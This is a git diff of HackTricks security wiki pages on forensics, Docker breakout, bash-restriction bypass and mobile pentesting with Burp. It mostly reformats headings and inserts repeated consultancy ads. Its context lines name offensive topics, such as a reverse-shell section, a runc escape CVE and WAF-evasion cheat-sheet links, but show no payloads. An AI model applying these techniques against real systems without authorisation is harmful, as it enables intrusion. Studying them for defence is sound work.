form of the certificate * All types of certificates & private keys can be encoded in DER format @@ -110,19 +117,19 @@ There are different formats that can be used to store a certificate. * DER formatted certificates most often use the ‘.cer’ and '.der' extensions * DER is typically used in Java Platforms -### **P7B/PKCS#7 Format** +#### **P7B/PKCS#7 Format** * The PKCS#7 or P7B format is stored in Base64 ASCII format and has a file extension of .p7b or .p7c * A P7B file only contains certificates and chain certificates (Intermediate CAs), not the private key * The most common platforms that support P7B files are Microsoft Windows and Java Tomcat -### **PFX/P12/PKCS#12 Format** +#### **PFX/P12/PKCS#12 Format** * The PKCS#12 or PFX/P12 format is a binary format for storing the server certificate, intermediate certificates, and the private key in one encryptable file * These files usually have extensions such as .pfx and .p12 * They are typically used on Windows machines to import and export certificates and private keys -## Formats conversions +### Formats conversions **Convert x509 to PEM** @@ -130,7 +137,7 @@ There are different formats that can be used to store a certificate. openssl x509 -in certificatename.cer -outform PEM -out certificatename.pem ``` -### **Convert PEM to DER** +#### **Convert PEM to DER** ``` openssl x509 -outform der -in certificatename.pem -out certificatename.der @@ -194,6 +201,13 @@ openssl pkcs7 -print_certs -in certificatename.p7b -out certificatename.cer openssl pkcs12 -export -in certificatename.cer -inkey privateKey.key -out certificatename.pfx -certfile cacert.cer ``` +{% hint style="danger" %} + + +Through Security Skills as a Service, we help organizations to **defend against the Dark Hacking Arts**. Security Skills as a Service is an offensive cybersecurity consultancy model that combines an Intelligent Platform with the top-class, globally distributed, offensive security engineers, delivering **high-quality penetration testing results. Security Hubs** bring together offensive penetration testing tactics with human behavioral science, providing real-time insights into threat actors' tradecraft and a **complete assessment of any risks**. + +{% embed url="https://securityhubs.io/" %} +{% endhint %}
@@ -210,5 +224,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
- - diff --git a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts.md b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts.md index ef7b96312..4870a5cc9 100644 --- a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts.md +++ b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts.md @@ -1,4 +1,4 @@ - +# Browser Artifacts
@@ -16,8 +16,15 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+{% hint style="danger" %} + -# Browsers Artefacts +Through Security Skills as a Service, we help organizations to **defend against the Dark Hacking Arts**. Security Skills as a Service is an offensive cybersecurity consultancy model that combines an Intelligent Platform with the top-class, globally distributed, offensive security engineers, delivering **high-quality penetration testing results. Security Hubs** bring together offensive penetration testing tactics with human behavioral science, providing real-time insights into threat actors' tradecraft and a **complete assessment of any risks**. + +{% embed url="https://securityhubs.io/" %} +{% endhint %} + +## Browsers Artefacts When we talk about browser artefacts we talk about, navigation history, bookmarks, list of downloaded files, cache data…etc. @@ -35,19 +42,19 @@ Let us take a look at the most common artefacts stored by browsers. * **Logins :** Self Explanatory. * **Favicons :** They are the little icons found in tabs, urls, bookmarks and the such. They can be used as another source to get more information about the website or places the user visited. * **Browser Sessions :** Self Explanatory. -* **Downloads :**Self Explanatory. +* \*\*Downloads :\*\*Self Explanatory. * **Form Data :** Anything typed inside forms is often times stored by the browser, so the next time the user enters something inside of a form the browser can suggest previously entered data. * **Thumbnails :** Self Explanatory. -# Firefox +## Firefox -Firefox use to create the profiles folder in \~/_**.mozilla/firefox/**_ (Linux), in **/Users/$USER/Library/Application Support/Firefox/Profiles/** (MacOS), _**%userprofile%\AppData\Roaming\Mozilla\Firefox\Profiles\\**_ (Windows)_**.**_\ +Firefox use to create the profiles folder in \~/_**.mozilla/firefox/**_ (Linux), in **/Users/$USER/Library/Application Support/Firefox/Profiles/** (MacOS), _**%userprofile%\AppData\Roaming\Mozilla\Firefox\Profiles\\**_ (Windows)_**.**_\ Inside this folder, the file _**profiles.ini**_ should appear with the name(s) of the used profile(s).\ -Each profile has a "**Path**" variable with the name of the folder where it's data is going to be stored. The folder should be **present in the same directory where the **_**profiles.ini**_** exist**. If it isn't, then, probably it was deleted. +Each profile has a "**Path**" variable with the name of the folder where it's data is going to be stored. The folder should be **present in the same directory where the \_profiles.ini**\_\*\* exist\*\*. If it isn't, then, probably it was deleted. Inside the folder **of each profile** (_\~/.mozilla/firefox/\/_) path you should be able to find the following interesting files: -* _**places.sqlite**_ : History (moz_\__places), bookmarks (moz\_bookmarks), and downloads (moz_\__annos). In windows the tool [BrowsingHistoryView](https://www.nirsoft.net/utils/browsing\_history\_view.html) can be used to read the history inside _**places.sqlite**_. +* _**places.sqlite**_ : History (moz\_\__places), bookmarks (moz\_bookmarks), and downloads (moz_\_\_annos). In windows the tool [BrowsingHistoryView](https://www.nirsoft.net/utils/browsing\_history\_view.html) can be used to read the history inside _**places.sqlite**_. * Query to dump history: `select datetime(lastvisitdate/1000000,'unixepoch') as visit_date, url, title, visit_count, visit_type FROM moz_places,moz_historyvisits WHERE moz_places.id = moz_historyvisits.place_id;` * Note that the link type is a number that indicates: * 1: User followed a link @@ -64,7 +71,7 @@ Inside the folder **of each profile** (_\~/.mozilla/firefox/\/_) pa * _**formhistory.sqlite**_ : **Web form data** (like emails) * _**handlers.json**_ : Protocol handlers (like, which app is going to handle _mailto://_ protocol) * _**persdict.dat**_ : Words added to the dictionary -* _**addons.json**_ and _**extensions.sqlite** _ : Installed addons and extensions +* _**addons.json**_ and \_**extensions.sqlite** \_ : Installed addons and extensions * _**cookies.sqlite**_ : Contains **cookies.** [**MZCookiesView**](https://www.nirsoft.net/utils/mzcv.html) can be used in Windows to inspect this file. * _**cache2/entries**_ or _**startupCache**_ : Cache data (\~350MB). Tricks like **data carving** can also be used to obtain the files saved in the cache. [MozillaCacheView](https://www.nirsoft.net/utils/mozilla\_cache\_viewer.html) can be used to see the **files saved in the cache**. @@ -98,9 +105,9 @@ done < $passfile ![](<../../../.gitbook/assets/image (417).png>) -# Google Chrome +## Google Chrome -Google Chrome creates the profile inside the home of the user _**\~/.config/google-chrome/**_ (Linux), in _**C:\Users\XXX\AppData\Local\Google\Chrome\User Data\\**_ (Windows), or in _**/Users/$USER/Library/Application Support/Google/Chrome/** _ (MacOS).\ +Google Chrome creates the profile inside the home of the user _**\~/.config/google-chrome/**_ (Linux), in _**C:\Users\XXX\AppData\Local\Google\Chrome\User Data\\**_ (Windows), or in \_**/Users/$USER/Library/Application Support/Google/Chrome/** \_ (MacOS).\ Most of the information will be saved inside the _**Default/**_ or _**ChromeDefaultData/**_ folders inside the paths indicated before. Inside here you can find the following interesting files: * _**History**_ : URLs, downloads and even searched keywords. In Windows you can use the tool [ChromeHistoryView](https://www.nirsoft.net/utils/chrome\_history\_view.html) to read the history. The "Transition Type" column means: @@ -125,11 +132,11 @@ Most of the information will be saved inside the _**Default/**_ or _**ChromeDefa * **Browser’s built-in anti-phishing:** `grep 'safebrowsing' ~/Library/Application Support/Google/Chrome/Default/Preferences` * You can simply grep for “**safebrowsing**” and look for `{"enabled: true,"}` in the result to indicate anti-phishing and malware protection is on. -# **SQLite DB Data Recovery** +## **SQLite DB Data Recovery** As you can observe in the previous sections, both Chrome and Firefox use **SQLite** databases to store the data. It's possible to **recover deleted entries using the tool** [**sqlparse**](https://github.com/padfoot999/sqlparse) **or** [**sqlparse\_gui**](https://github.com/mdegrazia/SQLite-Deleted-Records-Parser/releases). -# **Internet Explorer 11** +## **Internet Explorer 11** Internet Explorer stores **data** and **metadata** in different locations. The metadata will allow to find the data. @@ -145,11 +152,11 @@ Inside this table you can find in which other tables or containers each part of **Note that this table indicate also metadadata of the cache of other Microsoft tools also (e.g. skype)** -## Cache +### Cache You can use the tool [IECacheView](https://www.nirsoft.net/utils/ie\_cache\_viewer.html) to inspect the cache. You need to indicate the folder where you have extracted the cache date. -### Metadata +#### Metadata The metadata information about the cache stores: @@ -160,19 +167,19 @@ The metadata information about the cache stores: * CreationTime: First time it was cached * AccessedTime: Time when the cache was used * ModifiedTime: Last webpage version -* ExpiryTime: Time when the cache will expire +* ExpiryTime: Time when the cache will expire -### Files +#### Files The cache information can be found in _**%userprofile%\Appdata\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5**_ and _**%userprofile%\Appdata\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\low**_ The information inside these folders is a **snapshot of what the user was seeing**. The caches has a size of **250 MB** and the timestamps indicate when the page was visited (first time, creation date of the NTFS, last time, modification time of the NTFS). -## Cookies +### Cookies You can use the tool [IECookiesView](https://www.nirsoft.net/utils/iecookies.html) to inspect the cookies. You need to indicate the folder where you have extracted the cookies. -### **Metadata** +#### **Metadata** The metadata information about the cookies stores: @@ -184,15 +191,15 @@ The metadata information about the cookies stores: * AccessedTime: Last time the cookie was accesed * ExpiryTime: Time of expiration of the cookie -### Files +#### Files The cookies data can be found in _**%userprofile%\Appdata\Roaming\Microsoft\Windows\Cookies**_ and _**%userprofile%\Appdata\Roaming\Microsoft\Windows\Cookies\low**_ Session cookies will reside in memory and persistent cookie in the disk. -## Downloads +### Downloads -### **Metadata** +#### **Metadata** Checking the tool [ESEDatabaseView](https://www.nirsoft.net/utils/ese\_database\_view.html) you can find the container with the metadata of the downloads: @@ -200,25 +207,25 @@ Checking the tool [ESEDatabaseView](https://www.nirsoft.net/utils/ese\_database\ Getting the information of the column "ResponseHeaders" you can transform from hex that information and obtain the URL, the file type and the location of the downloaded file. -### Files +#### Files Look in the path _**%userprofile%\Appdata\Roaming\Microsoft\Windows\IEDownloadHistory**_ -## **History** +### **History** The tool [BrowsingHistoryView](https://www.nirsoft.net/utils/browsing\_history\_view.html) can be used to read the history. But first you need to indicate the browser in advanced options and the location of the extracted history files. -### **Metadata** +#### **Metadata** * ModifiedTime: First time a URL is found * AccessedTime: Last time * AccessCount: Number of times accessed -### **Files** +#### **Files** -Search in _**userprofile%\Appdata\Local\Microsoft\Windows\History\History.IE5**_ and _**userprofile%\Appdata\Local\Microsoft\Windows\History\Low\History.IE5**_ +Search in _**userprofile%\Appdata\Local\Microsoft\Windows\History\History.IE5**_ and _**userprofile%\Appdata\Local\Microsoft\Windows\History\Low\History.IE5**_ -## **Typed URLs** +### **Typed URLs** This information can be found inside the registry NTDUSER.DAT in the path: @@ -227,7 +234,7 @@ This information can be found inside the registry NTDUSER.DAT in the path: * _**Software\Microsoft\InternetExplorer\TypedURLsTime**_ * last time the URL was typed -# Microsoft Edge +## Microsoft Edge For analyzing Microsoft Edge artifacts all the **explanations about cache and locations from the previous section (IE 11) remain valid** with the only difference that the base locating in this case is _**%userprofile%\Appdata\Local\Packages**_ (as can be observed in the following paths): @@ -237,7 +244,7 @@ For analyzing Microsoft Edge artifacts all the **explanations about cache and lo * Cache: _**C:\Users\XXX\AppData\Local\Packages\Microsoft.MicrosoftEdge\_XXX\AC#!XXX\MicrosoftEdge\Cache**_ * Last active sessions: _**C:\Users\XX\AppData\Local\Packages\Microsoft.MicrosoftEdge\_XXX\AC\MicrosoftEdge\User\Default\Recovery\Active**_ -# **Safari** +## **Safari** The databases can be found in `/Users/$User/Library/Safari` @@ -256,7 +263,7 @@ The databases can be found in `/Users/$User/Library/Safari` * **Browser’s built-in anti-phishing:** `defaults read com.apple.Safari WarnAboutFraudulentWebsites` * The reply should be 1 to indicate the setting is active -# Opera +## Opera The databases can be found in `/Users/$USER/Library/Application Support/com.operasoftware.Opera` @@ -265,6 +272,13 @@ Opera **stores browser history and download data in the exact same format as Goo * **Browser’s built-in anti-phishing:** `grep --color 'fraud_protection_enabled' ~/Library/Application Support/com.operasoftware.Opera/Preferences` * **fraud\_protection\_enabled** should be **true** +{% hint style="danger" %} + + +Through Security Skills as a Service, we help organizations to **defend against the Dark Hacking Arts**. Security Skills as a Service is an offensive cybersecurity consultancy model that combines an Intelligent Platform with the top-class, globally distributed, offensive security engineers, delivering **high-quality penetration testing results. Security Hubs** bring together offensive penetration testing tactics with human behavioral science, providing real-time insights into threat actors' tradecraft and a **complete assessment of any risks**. + +{% embed url="https://securityhubs.io/" %} +{% endhint %}
@@ -281,5 +295,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
- - diff --git a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/local-cloud-storage.md b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/local-cloud-storage.md index 8372725aa..0b41f82a3 100644 --- a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/local-cloud-storage.md +++ b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/local-cloud-storage.md @@ -1,4 +1,4 @@ - +# Local Cloud Storage
@@ -16,8 +16,15 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+{% hint style="danger" %} + -# OneDrive +Through Security Skills as a Service, we help organizations to **defend against the Dark Hacking Arts**. Security Skills as a Service is an offensive cybersecurity consultancy model that combines an Intelligent Platform with the top-class, globally distributed, offensive security engineers, delivering **high-quality penetration testing results. Security Hubs** bring together offensive penetration testing tactics with human behavioral science, providing real-time insights into threat actors' tradecraft and a **complete assessment of any risks**. + +{% embed url="https://securityhubs.io/" %} +{% endhint %} + +## OneDrive In Windows you can find the OneDrive folder in `\Users\\AppData\Local\Microsoft\OneDrive`\ And inside `logs\Personal` it's possible to find the file `SyncDiagnostics.log` which contains some interesting data regarding the synchronized files: @@ -33,7 +40,7 @@ And inside `logs\Personal` it's possible to find the file `SyncDiagnostics.log` Once you have found the CID it's recommended to **search files containing this ID**. You may be able to find files with the name: _**\.ini**_ and _**\.dat**_ that may contain interesting information like the names of files syncronized with OneDrive. -# Google Drive +## Google Drive In Widows you can find the main Google Drive folder in `\Users\\AppData\Local\Google\Drive\user_default`\ This folder contains a file called Sync\_log.log with information like the email address of the account, filenames, timestamps, MD5 hashes of the files...\ @@ -44,9 +51,9 @@ In this table you can find: the **name** of the **synchronized** **files**, modi The table data of the database **`Sync_config.db`** contains the email address of the account, path of the shared folders and Google Drive version. -# Dropbox +## Dropbox -Dropbox uses **SQLite databases** to mange the files. In this \ +Dropbox uses **SQLite databases** to mange the files. In this\ You can find the databases in the folders: * `\Users\\AppData\Local\Dropbox` @@ -113,6 +120,13 @@ Other tables inside this database contain more interesting information: * **deleted\_fields**: Dropbox deleted files * **date\_added** +{% hint style="danger" %} + + +Through Security Skills as a Service, we help organizations to **defend against the Dark Hacking Arts**. Security Skills as a Service is an offensive cybersecurity consultancy model that combines an Intelligent Platform with the top-class, globally distributed, offensive security engineers, delivering **high-quality penetration testing results. Security Hubs** bring together offensive penetration testing tactics with human behavioral science, providing real-time insights into threat actors' tradecraft and a **complete assessment of any risks**. + +{% embed url="https://securityhubs.io/" %} +{% endhint %}
@@ -129,5 +143,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
- - diff --git a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/office-file-analysis.md b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/office-file-analysis.md index ecfff9dfb..3e00bb343 100644 --- a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/office-file-analysis.md +++ b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/office-file-analysis.md @@ -1,4 +1,4 @@ - +# Office file analysis
@@ -16,8 +16,15 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+{% hint style="danger" %} + -# Introduction +Through Security Skills as a Service, we help organizations to **defend against the Dark Hacking Arts**. Security Skills as a Service is an offensive cybersecurity consultancy model that combines an Intelligent Platform with the top-class, globally distributed, offensive security engineers, delivering **high-quality penetration testing results. Security Hubs** bring together offensive penetration testing tactics with human behavioral science, providing real-time insights into threat actors' tradecraft and a **complete assessment of any risks**. + +{% embed url="https://securityhubs.io/" %} +{% endhint %} + +## Introduction Microsoft has created **dozens of office document file formats**, many of which are popular for the distribution of phishing attacks and malware because of their ability to **include macros** (VBA scripts). @@ -74,22 +81,21 @@ Sometimes the challenge is not to find hidden static data, but to **analyze a VB $ soffice path/to/test.docx macro://./standard.module1.mymacro ``` -# [oletools](https://github.com/decalage2/oletools) +## [oletools](https://github.com/decalage2/oletools) ```bash sudo pip3 install -U oletools olevba -c /path/to/document #Extract macros ``` -# Automatic Execution +## Automatic Execution Macro functions like `AutoOpen`, `AutoExec` or `Document_Open` will be **automatically** **executed**. -# References +## References * [https://trailofbits.github.io/ctf/forensics/](https://trailofbits.github.io/ctf/forensics/) -
Support HackTricks and get benefits! @@ -105,5 +111,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
- - diff --git a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/pdf-file-analysis.md b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/pdf-file-analysis.md index cd0e701a6..77f2be756 100644 --- a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/pdf-file-analysis.md +++ b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/pdf-file-analysis.md @@ -1,4 +1,4 @@ - +# PDF File analysis
@@ -16,6 +16,13 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+{% hint style="danger" %} + + +Through Security Skills as a Service, we help organizations to **defend against the Dark Hacking Arts**. Security Skills as a Service is an offensive cybersecurity consultancy model that combines an Intelligent Platform with the top-class, globally distributed, offensive security engineers, delivering **high-quality penetration testing results. Security Hubs** bring together offensive penetration testing tactics with human behavioral science, providing real-time insights into threat actors' tradecraft and a **complete assessment of any risks**. + +{% embed url="https://securityhubs.io/" %} +{% endhint %} From: [https://trailofbits.github.io/ctf/forensics/](https://trailofbits.github.io/ctf/forensics/) @@ -37,10 +44,6 @@ When exploring PDF content for hidden data, some of the hiding places to check i There are also several Python packages for working with the PDF file format, like [PeepDF](https://github.com/jesparza/peepdf), that enable you to write your own parsing scripts. - - - -
Support HackTricks and get benefits! @@ -56,5 +59,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
- - diff --git a/linux-hardening/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation/README.md b/linux-hardening/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation/README.md index 38fd379a9..6b3586dea 100644 --- a/linux-hardening/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation/README.md +++ b/linux-hardening/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation/README.md @@ -16,6 +16,14 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) +{% hint style="danger" %} + + +Through Security Skills as a Service, we help organizations to **defend against the Dark Hacking Arts**. Security Skills as a Service is an offensive cybersecurity consultancy model that combines an Intelligent Platform with the top-class, globally distributed, offensive security engineers, delivering **high-quality penetration testing results. Security Hubs** bring together offensive penetration testing tactics with human behavioral science, providing real-time insights into threat actors' tradecraft and a **complete assessment of any risks**. + +{% embed url="https://securityhubs.io/" %} +{% endhint %} + ## Automatic Enumeration & Escape * [**linpeas**](https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS): It can also **enumerate containers** @@ -447,6 +455,14 @@ If you only have `hostIPC=true`, you most likely can't do much. If any process o * **Inspect /dev/shm** - Look for any files in this shared memory location: `ls -la /dev/shm` * **Inspect existing IPC facilities** – You can check to see if any IPC facilities are being used with `/usr/bin/ipcs`. Check it with: `ipcs -a` +{% hint style="danger" %} + + +Through Security Skills as a Service, we help organizations to **defend against the Dark Hacking Arts**. Security Skills as a Service is an offensive cybersecurity consultancy model that combines an Intelligent Platform with the top-class, globally distributed, offensive security engineers, delivering **high-quality penetration testing results. Security Hubs** bring together offensive penetration testing tactics with human behavioral science, providing real-time insights into threat actors' tradecraft and a **complete assessment of any risks**. + +{% embed url="https://securityhubs.io/" %} +{% endhint %} + ## CVEs ### Runc exploit (CVE-2019-5736) @@ -490,6 +506,14 @@ If you are in **userspace** (**no kernel exploit** involved) the way to find new * [https://0xn3va.gitbook.io/cheat-sheets/container/escaping/exposed-docker-socket](https://0xn3va.gitbook.io/cheat-sheets/container/escaping/exposed-docker-socket) * [https://bishopfox.com/blog/kubernetes-pod-privilege-escalation#Pod4](https://bishopfox.com/blog/kubernetes-pod-privilege-escalation#Pod4) +{% hint style="danger" %} + + +Through Security Skills as a Service, we help organizations to **defend against the Dark Hacking Arts**. Security Skills as a Service is an offensive cybersecurity consultancy model that combines an Intelligent Platform with the top-class, globally distributed, offensive security engineers, delivering **high-quality penetration testing results. Security Hubs** bring together offensive penetration testing tactics with human behavioral science, providing real-time insights into threat actors' tradecraft and a **complete assessment of any risks**. + +{% embed url="https://securityhubs.io/" %} +{% endhint %} +
Support HackTricks and get benefits! diff --git a/linux-hardening/useful-linux-commands/bypass-bash-restrictions.md b/linux-hardening/useful-linux-commands/bypass-bash-restrictions.md index ac31b0dfd..ed13ed8cc 100644 --- a/linux-hardening/useful-linux-commands/bypass-bash-restrictions.md +++ b/linux-hardening/useful-linux-commands/bypass-bash-restrictions.md @@ -16,6 +16,14 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+{% hint style="danger" %} + + +Through Security Skills as a Service, we help organizations to **defend against the Dark Hacking Arts**. Security Skills as a Service is an offensive cybersecurity consultancy model that combines an Intelligent Platform with the top-class, globally distributed, offensive security engineers, delivering **high-quality penetration testing results. Security Hubs** bring together offensive penetration testing tactics with human behavioral science, providing real-time insights into threat actors' tradecraft and a **complete assessment of any risks**. + +{% embed url="https://securityhubs.io/" %} +{% endhint %} + ## Common Limitations Bypasses ### Reverse Shell @@ -165,13 +173,18 @@ If you are inside a filesystem with the **read-only and noexec protections** the ## References & More -{% embed url="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection#exploits" %} +* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection#exploits](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection#exploits) +* [https://github.com/Bo0oM/WAF-bypass-Cheat-Sheet](https://github.com/Bo0oM/WAF-bypass-Cheat-Sheet) +* [https://medium.com/secjuice/web-application-firewall-waf-evasion-techniques-2-125995f3e7b0](https://medium.com/secjuice/web-application-firewall-waf-evasion-techniques-2-125995f3e7b0) +* [https://www.secjuice.com/web-application-firewall-waf-evasion/](https://www.secjuice.com/web-application-firewall-waf-evasion/) -{% embed url="https://github.com/Bo0oM/WAF-bypass-Cheat-Sheet" %} +{% hint style="danger" %} + -{% embed url="https://medium.com/secjuice/web-application-firewall-waf-evasion-techniques-2-125995f3e7b0" %} +Through Security Skills as a Service, we help organizations to **defend against the Dark Hacking Arts**. Security Skills as a Service is an offensive cybersecurity consultancy model that combines an Intelligent Platform with the top-class, globally distributed, offensive security engineers, delivering **high-quality penetration testing results. Security Hubs** bring together offensive penetration testing tactics with human behavioral science, providing real-time insights into threat actors' tradecraft and a **complete assessment of any risks**. -{% embed url="https://www.secjuice.com/web-application-firewall-waf-evasion/" %} +{% embed url="https://securityhubs.io/" %} +{% endhint %}
diff --git a/mobile-pentesting/android-app-pentesting/android-burp-suite-settings.md b/mobile-pentesting/android-app-pentesting/android-burp-suite-settings.md index b882fcba6..531847c96 100644 --- a/mobile-pentesting/android-app-pentesting/android-burp-suite-settings.md +++ b/mobile-pentesting/android-app-pentesting/android-burp-suite-settings.md @@ -1,4 +1,4 @@ - +# Burp Suite Configuration for Android
@@ -16,10 +16,17 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+{% hint style="danger" %} + + +Through Security Skills as a Service, we help organizations to **defend against the Dark Hacking Arts**. Security Skills as a Service is an offensive cybersecurity consultancy model that combines an Intelligent Platform with the top-class, globally distributed, offensive security engineers, delivering **high-quality penetration testing results. Security Hubs** bring together offensive penetration testing tactics with human behavioral science, providing real-time insights into threat actors' tradecraft and a **complete assessment of any risks**. + +{% embed url="https://securityhubs.io/" %} +{% endhint %} **This tutorial was taken from:** [**https://medium.com/@ehsahil/basic-android-security-testing-lab-part-1-a2b87e667533**](https://medium.com/@ehsahil/basic-android-security-testing-lab-part-1-a2b87e667533) -# Add a proxy in Burp Suite to listen. +## Add a proxy in Burp Suite to listen. Address: **192.168.56.1** & Port: **1337** @@ -27,7 +34,7 @@ Choose _**All Interfaces**_ option. ![](https://miro.medium.com/max/700/1\*0Bn7HvqI775Nr5fXGcqoJA.png) -# **Adding listener in Android device.** +## **Adding listener in Android device.** Setting → Wifi →WiredSSID (Long press) @@ -47,7 +54,7 @@ Testing connection over http and https using devices browser. ![](https://miro.medium.com/max/700/1\*M-AoG6Yqo21D9qgQHLCSzQ.png) -# **Installing burp certificate in android device.** +## **Installing burp certificate in android device.** Download burp certificate. — Use your desktop machine to download the certificate. @@ -85,6 +92,13 @@ After installing Certificate SSL endpoints also working fine tested using → [h After installing the certificate this way Firefox for Android won't use it (based on my tests), so use a different browser. {% endhint %} +{% hint style="danger" %} + + +Through Security Skills as a Service, we help organizations to **defend against the Dark Hacking Arts**. Security Skills as a Service is an offensive cybersecurity consultancy model that combines an Intelligent Platform with the top-class, globally distributed, offensive security engineers, delivering **high-quality penetration testing results. Security Hubs** bring together offensive penetration testing tactics with human behavioral science, providing real-time insights into threat actors' tradecraft and a **complete assessment of any risks**. + +{% embed url="https://securityhubs.io/" %} +{% endhint %}
@@ -101,5 +115,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
- - diff --git a/mobile-pentesting/ios-pentesting/README.md b/mobile-pentesting/ios-pentesting/README.md index 906f148a2..2da9acce5 100644 --- a/mobile-pentesting/ios-pentesting/README.md +++ b/mobile-pentesting/ios-pentesting/README.md @@ -1,5 +1,13 @@ # iOS Pentesting +{% hint style="danger" %} + + +Through Security Skills as a Service, we help organizations to **defend against the Dark Hacking Arts**. Security Skills as a Service is an offensive cybersecurity consultancy model that combines an Intelligent Platform with the top-class, globally distributed, offensive security engineers, delivering **high-quality penetration testing results. Security Hubs** bring together offensive penetration testing tactics with human behavioral science, providing real-time insights into threat actors' tradecraft and a **complete assessment of any risks**. + +{% embed url="https://securityhubs.io/" %} +{% endhint %} + ## iOS Pentesting
@@ -380,6 +388,14 @@ struct CGSize { However, the best options to disassemble the binary are: [**Hopper**](https://www.hopperapp.com/download.html?) and [**IDA**](https://www.hex-rays.com/products/ida/support/download\_freeware/). +{% hint style="danger" %} + + +Through Security Skills as a Service, we help organizations to **defend against the Dark Hacking Arts**. Security Skills as a Service is an offensive cybersecurity consultancy model that combines an Intelligent Platform with the top-class, globally distributed, offensive security engineers, delivering **high-quality penetration testing results. Security Hubs** bring together offensive penetration testing tactics with human behavioral science, providing real-time insights into threat actors' tradecraft and a **complete assessment of any risks**. + +{% embed url="https://securityhubs.io/" %} +{% endhint %} + ## Data Storage To learn about how iOS stores data in the device read this page: @@ -734,6 +750,14 @@ Jun 7 13:42:14 iPhone touch[9708] : MS:Notice: Injecting: (null) [touch ... ``` +{% hint style="danger" %} + + +Through Security Skills as a Service, we help organizations to **defend against the Dark Hacking Arts**. Security Skills as a Service is an offensive cybersecurity consultancy model that combines an Intelligent Platform with the top-class, globally distributed, offensive security engineers, delivering **high-quality penetration testing results. Security Hubs** bring together offensive penetration testing tactics with human behavioral science, providing real-time insights into threat actors' tradecraft and a **complete assessment of any risks**. + +{% embed url="https://securityhubs.io/" %} +{% endhint %} + ## Backups iOS includes auto-backup features that create copies of the data stored on the device. You can **make iOS backups** from your host computer by using iTunes (till macOS Catalina) or Finder (from macOS Catalina onwards), or via the iCloud backup feature. In both cases, the backup includes nearly all data stored on the iOS device except highly sensitive data such as Apple Pay information and Touch ID settings. @@ -1152,6 +1176,14 @@ You can find the **libraries used by an application** by running **`otool`** aga * [https://github.com/authenticationfailure/WheresMyBrowser.iOS](https://github.com/authenticationfailure/WheresMyBrowser.iOS) * [https://github.com/nabla-c0d3/ssl-kill-switch2](https://github.com/nabla-c0d3/ssl-kill-switch2) +{% hint style="danger" %} + + +Through Security Skills as a Service, we help organizations to **defend against the Dark Hacking Arts**. Security Skills as a Service is an offensive cybersecurity consultancy model that combines an Intelligent Platform with the top-class, globally distributed, offensive security engineers, delivering **high-quality penetration testing results. Security Hubs** bring together offensive penetration testing tactics with human behavioral science, providing real-time insights into threat actors' tradecraft and a **complete assessment of any risks**. + +{% embed url="https://securityhubs.io/" %} +{% endhint %} +
Support HackTricks and get benefits! diff --git a/mobile-pentesting/ios-pentesting/burp-configuration-for-ios.md b/mobile-pentesting/ios-pentesting/burp-configuration-for-ios.md index f7816ba72..12b9351cf 100644 --- a/mobile-pentesting/ios-pentesting/burp-configuration-for-ios.md +++ b/mobile-pentesting/ios-pentesting/burp-configuration-for-ios.md @@ -1,4 +1,4 @@ - +# Burp Suite Configuration for iOS
@@ -16,24 +16,31 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
